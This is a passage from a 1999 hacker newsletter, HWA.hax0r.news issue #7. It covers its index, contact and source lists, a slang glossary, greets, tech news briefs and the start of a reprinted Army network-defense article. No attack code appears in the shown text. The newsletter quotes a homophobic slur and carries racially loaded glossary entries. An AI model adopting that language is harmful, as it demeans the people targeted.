Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / HWA-hn7.txt < prev next >

Wrap

Text File | 1999-03-24 | 139.7 KB | 2,965 lines

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 7 Volume 1 1999 Feb 20th 99 ========================================================================== "I got the teenage depression, thats all i'm talkin about, if you dunno what i mean then you better look out, look out!" - Eddie & The Hotrods Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #7 =-----------------------------------------------------------------------= "I dunno what i'm doing, but i'm damn good at it" - Seen on a button worn by ed.. ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** ******************************************************************* =-------------------------------------------------------------------------= Issue #7 little endian release, Feb 20th 1999 Don't be happy, worry. =--------------------------------------------------------------------------= inet.d THIS b1lly the llammah ________ ------- ___________________________________________________________ |\____\_/[ INDEX ]__________________________________________________________/| | | || | | Key Content || \|_________________________________________________________________________/ 00.0 .. COPYRIGHTS 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC 00.2 .. SOURCES 00.3 .. THIS IS WHO WE ARE 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'? 00.5 .. THE HWA_FAQ V1.0 \__________________________________________________________________________/ 01.0 .. Greets 01.1 .. Last minute stuff, rumours, newsbytes, mailbag 02.0 .. From the editor 03.0 .. Army Signal Command protecting networks from hackers 04.0 .. France plays leapfrog with US over crypto laws.. 05.0 .. More kewl poetry from Phiregod 06.0 .. ISP cracks User's machine then threatens legal action on THEM 07.0 .. l0pht releases new NT admin exploit (and patch) 07.1 .. Hackers Get Their Final Fantasy 08.0 .. dcc yerself some r00t 09.0 .. Cyrix bug crashes cpus 10.0 .. Intel's id on a chip is more than it may seem 11.0 .. Security Snake Oil (From CryptoGram) 12.0 .. The Hacker Challenge (Reprint from HNN w/permission) by Qubik 13.0 .. Trojans have come a long way, heres one in basic for some fun. AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. H.W .. Hacked Websites www.l0pht.com and www.hackernews.com hacked?? A.0 .. APPENDICES A.1 .. PHACVW linx and references ____________________________________________________________________________ |\__________________________________________________________________________/| | | || | | || | | The name Linus means "flaxen-haired" and is of Greek origin ...- Ed || | | || | | || | | "Shouting the loudest does not make you right or true" - FP || | | || \|_________________________________________________________________________|/ @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!* News (New site unconfirmed).......http://cnewz98.hypermart.net/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. Referenced news links ~~~~~~~~~~~~~~~~~~~~~ http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ "silly faggot, dix are for chix" - from irc ... by unknown ;-) All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) BEST-OF-SECURITY Subscription Info. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe|mail best-of-security-request@suburbia.net" or "echo subscribe|mail best-of-security-request-d@suburbia.net" (weekly digest) For those of you that just don't get the above, try sending a message to best-of-security-request@suburbia.net with a subject and body of subscribe and you will get added to the list (maybe, if the admin likes your email). Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe, visit http://www.counterpane.com/unsubform.html.á Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.á He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09 ááááá ááááááááááááááááááááá ISSNá 1004-042X áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu) áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) áááááá Archivist: Brendan Kehoe áááááá Poof Reader:áá Etaion Shrdlu, Jr. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala ááááááááááááááááááááááááá Ian Dickinson áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ 'A "thug" was once the name for a ritual strangler, and is taken from the Hindu word Thag... ' - Ed Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ liquid phire......................: underground prose Qubik ............................: Hacking in Germany+ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * k-os * gphoe * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ AT&T-TCI merger faces deadline Contributed by sAs72 source: ZDNet The fate of AT&T's multibillion-dollar merger with TCI will soon be decided. City commissions in Seattle and other municipalities have put up a good fight over cable open access, but must vote today on whether to approve or deny the deal, along with the transfer of cable licenses in their areas. http://www.news.com/News/Item/0%2C4%2C32441%2C00.html?dd.ne.txt.0216.02 ++ Intel drives low-cost cable modems High-speed cable modems may become cheaper in the near future as a result of an Intel initiative now coming to light.á Intel is working with Libit Signal Processing and possibly other partners to produce a futuristic breed of devices called "host-based" cable modems.á News.com explains how these devices work. http://www.news.com/News/Item/0%2C4%2C32406%2C00.html?dd.ne.txt.0216.03 ++ Boycott pressure in full force Critics of Intel's new chip technology are trying to widen a boycott and enlist the government to take a stand against the Pentium III processor which the critics say can trace where users have been on the Internet.á Will they succeed before the February 26 release date? http://www.news.com/News/Item/0%2C4%2C32410%2C00.html?dd.ne.txt.0216.04 áááá++á ABOUT THOSE FREE IMACS ... (BUS. 10:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/17961.html áá Before you sign up for the iMac giveaway that One Stop ááááá Communications is hawking, you might want to check out the ááááááá company founder's checkered history. By Craig Bicknell. áááááááááá . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . áááá++áá BIG BLUE DOES DIGITAL BROADCAST (TECH. 9:30 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/17960.html áááááááá The computer giant said it will team up with five companies áááááááá to secure digitally broadcast content... Also: Owners of the áááááááá mighty Rio MP3 player can now dress up the device. áááááááááá . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . áááá++ AT&T OWNERS BACK TCI DEAL (BUS. 7:40 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/17954.html áááááááThe merger of the phone giant and the cable company easily áááááááclears another barrier. á áááá++áBELLSOUTH, 3COM GET SPEEDY (TECH. 7:40 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/17956.html áááááááThe phone company wants to make digital subscriber lines áááááááaccessible in the South, so it'll offer 3Com modems and ááááááájoint sales, online and off. ááááááááá ááá++áCHIPS AHOY (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/17952.html áááááááSony unveils its new PlayStation super-chip and wows an áááááááannual gathering of leading processor designers. Leander áááááááKahney reports from San Francisco. ááááááááá áááá++áTHE MOST WIRED NATION ON EARTH (BUS. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/17948.html áááááááCanada's finance minister announces a four-year C$1.8 billion áááááááspending plan to connect every corner of the ááááááánorthern nation. ááááááááá áááá++áEFF APPOINTS NEW DIRECTOR (POL. Tuesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/17941.html áááááááWith one foot in Silicon Valley and one on Capitol Hill, Tara áááááááLemmey will lead the Electronic Frontier Foundation into the ááááááánext millennium. Observers are beaming. By James Glave. ááááááá áááá++áá CRISPER, CHEAPER PIX OF EARTH (TECH. Tuesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/17936.html áááááá The burgeoning market for satellite images of the world is áááááá driving the need for affordable software to process them. áááááá Enter a new open-source project that does just that. By á áááá Chris Oakes. áááááááááá áááá++áá UPSCALE ONLINE AUCTIONING (BUS. Tuesday) http://www.wired.com/news/news/email/explode-infobeat/business/story/17940.html áááááááá Sotheby's ups the ante of online auctioning. The exclusive áááááááá auction house has signed over 1,000 art dealers to sell áááááááá merchandise on its new site. ááááááááá áááá++áá COMPAQ BUYS ZIP2 (BUS. Tuesday) http://www.wired.com/news/news/email/explode-infobeat/business/story/17939.html áááááááá The PC maker buys the online-publishing software vendor to áááááááá beef up AltaVista. Also: Drugstore.com lands on AOL, áááááááá Excite.... ETrade to sell own mutual funds.... And more. ++ Snarfed by sAs- contributed by erehwon (HNN) Feb 19th'99 The National Police Agency of Japan has said that high-tech crime has risen 58% in the country over the last year. They said there where 415 cases categorized as high-tech crimes in 1998, compared to 262 in 1997. Computer-related fraud included forging bank account data and reprogramming electromagnetic data. Detriot News ............http://deseretnews.com/dn/view/0,1249,30011968,00.html? San Jose Mecury News.....http://www.sjmercury.com/breaking/docs/015380.html Nando Times..............http://www.techserver.com/story/body/0,1634,19705-32364-235694-0,00.html ++ Scanners illegal Contributed by sw3 Source: Innerpulse News Network at csoft.net Wednesday - February 10, 1999. 05:05PM UTC Reported today on HNN; the Wireless Privacy Enhacement Act of 1999 has been entered into the US House of Representatives by Rep. Heather Wilson. That would make illegal devices that can receive or decode personal radio communication such as police bands, cellular phones, pagers; such as scanners. (luckily us ham types and tech types know so many ways around this it doesn't matter to us but it sure sucks for the poor mr and mrs average scanner owner - Ed) Rep. Wilson's website: http://www.house.gov/wilson/welcome.html ask.heather@mail.house.gov ++ Federal budget buys some space Contributed by sAs- source: EXN science wire ááttp://exn.ca/html/templates/mastertop.cfm?ID=19990217-53 Packed with funding goodies -- the 1999 federal budget has left the employees of the Canadian Space Agency starry-eyed.á "The mood is great here," confirmed jubilant CSA spokesman Hugues Gilbert in a telephone interview Wednesday.áá And why wouldn't it be?á The budget announced by Finance Minister Paul Martin's this week gives the space agency an extra $430 million over the next three years, plusá $300 mil annually after that.áááá ááááá++ Hands-off and intelligent Contributed by sAs- source: EXN science wire http://exn.ca/html/templates/mastertop.cfm?ID=19990217-55 The day when your average car driver can relax, put his hands behind his head and watch all the pretty trees go by is not quite upon us yet. But researchers in Germany won't rest until it is. They're busy developing an autonomous intelligent copilot system that should ultimately be able to get you from point A to B with almost no input on your part. You still might have to take charge of the sound system, though. - this should be fun when it comes out, <beep> WARNING! your vehicle has just been hijacked! - Ed Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include <stdio.h> #include <insight.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* *Ok kiddies we're pumping out some more stuff here as we steamroll into *issue #6 i'm wondering if we can really pull off a weekly release as *hoped. I mean hopefully not too many people are getting caught and not *too many sites (bah hahahaha yeah right) are being vandalized by the script *kiddiez etc. Work continues on hwa-iwa.org which is running Debian Linux at *this time, i'm playing around with some stuff there but don't bother port *scanning etc u won't find anything interesting on that box unless you really *want to snarf half written articles <grin> etc ... besides if you did break *in i'd just end up writing a story about it so whats the point? *g* moving *right along, thanks for the continued support everyone and tty next time... */ printf ("EoF.\n"); } www.hwa-iwa.org is now online but not ready for primetime yet, if you go there you will just be presented with a link to the HWA.hax0r.news mirrors the site is under major development and will be announced here when it goes "online for primetime" with webboard and file archives etc etc, stay tuned for more as it becomes available ie: as I get it done ... ;) Issue #6! ... w00t w00t w00t! ... w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk. 1. A transcursion or transcendance into joy from an otherwise inert state 2. Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Army Signal Command protecting networks from hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To: InfoSec News <isn@repsec.com> Subject: [ISN] Army Signal Command protecting networks from hackers http://www.dtic.mil/armylink/news/Feb1999/a19990211hacksec.html Army Signal Command protecting networks from hackers by Sgt. 1st Class Jim Ward FORT HUACHUCA, Ariz., (Army News Service, Feb. 11, 1999) -- Soldiers on patrol in countries spanning the globe are the sentries who keep enemies at bay. Even as they stand guard at the dawn of the new century, a system called information assurance is doing likewise -- with them in mind. Information assurance is the umbrella term for what is a new way to ensure that the military's computer networks withstand withering attacks from foreign and domestic hackers. Leading the charge in this effort is a team of computer networkers and specialists with the U.S.á Army Signal Command. This team has been working since March 1998 to accomplish a mission handed down from the highest levels of the defense leadership. According to Lt. Col. James M. Withers, the head of the team, the team's charter is simple: devise a strategy that will keep critical networks as safe from intrusion as possible, and an action plan to help get there. "Our mission, as outlined by the Army vice chief of staff is to implement near real time, worldwide, common picture of the Army's Military Information Environment," Withers said. This was done by combining the Army's Information Service Provider functions with the Army Regional Computer Emergency Response Team. This, according to Withers, ensures that reporting of this common picture of this Military Information Environment to a central coordination center, located at Fort Huachuca. "This action provided the Army Signal Command with an enhanced acquisition of unified and global near-real-time protect, detect and react capabilities through the lash-up of these two functions,"á Withers said. Withers said that this process involves computer systems specialists from around the world. These personnel, in tandem with the Army Regional Computer Emergency Response Team, combine forces to detect hackers and others as soon as possible before damage can be done. Computer systems specialists with the 1st Signal Brigade in Korea, the 516th Signal Battalion in Hawaii and the 5th Signal Command in Germany operate and maintain Network and Systems Operations Centers. These soldiers and civilians are responsible for the detection effort in their theaters and report activity to the Army Signal Command headquarters. Once at the ASC level, Army Network and Systems Operations Center staff performs over-watch on most of the Army's networks. This is an effort to keep the networks humming along, providing the information lifeline soldiers rely on as they perform their peace 